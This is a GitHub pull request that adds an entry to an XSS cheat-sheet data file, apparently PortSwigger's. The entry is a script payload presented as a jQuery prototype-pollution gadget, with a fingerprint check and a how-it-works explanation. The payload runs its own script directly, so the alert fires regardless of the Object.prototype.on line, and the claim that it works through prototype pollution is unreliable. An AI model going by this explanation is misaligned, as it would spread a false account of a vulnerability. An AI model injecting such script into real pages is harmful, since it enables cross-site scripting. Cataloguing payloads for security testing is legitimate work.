### PR TITLE
Update prototype-pollution.json

### DIFF
--- a/json/prototype-pollution.json
+++ b/json/prototype-pollution.json
@@ -218,5 +218,16 @@
         "twitterHandle": "SecurityMB",
         "version": "",
         "fingerprint": ""
-    }
+    },
+
+    {
+        "library": "$(x).on jQuery",
+        "payload": "<script>\nObject.prototype.on = 'click';\n$('body').on('click', function() { alert('Injected Event'); });\n$('body').trigger('click');\n<\/script>",
+        "frameworkCode": "<script src=https://code.jquery.com/jquery-3.3.1.js><\/script>",
+        "frameworkAfter": false,
+        "author": "Andrei Nicolaiciuc",
+        "twitterHandle": "DevSec0ps",
+        "version": "All versions",
+        "fingerprint": "return (typeof $ !== 'undefined' && typeof $.fn !== 'undefined' && typeof $.fn.jquery !== 'undefined')"
+    } 
 ]


### PR DESCRIPTION
Hello. Just found new working payload.
![image](https://github.com/PortSwigger/xss-cheatsheet-data/assets/83069165/b641bbdb-0918-41f9-b022-3cc994b79f34)

**How it Works**
Prototype Pollution:

By setting Object.prototype.on = 'click';, the .on() method in jQuery is influenced to handle click events regardless of the event type specified.

Event Handling:

The $('body').on('click', function() { alert('Injected Event'); }); line binds an event handler to the body for click events. Due to the prototype pollution, this binding is now tied to the click event specifically.

Triggering the Event:

The $('body').trigger('click'); line programmatically triggers the click event, causing the previously defined event handler to execute, showing the alert.

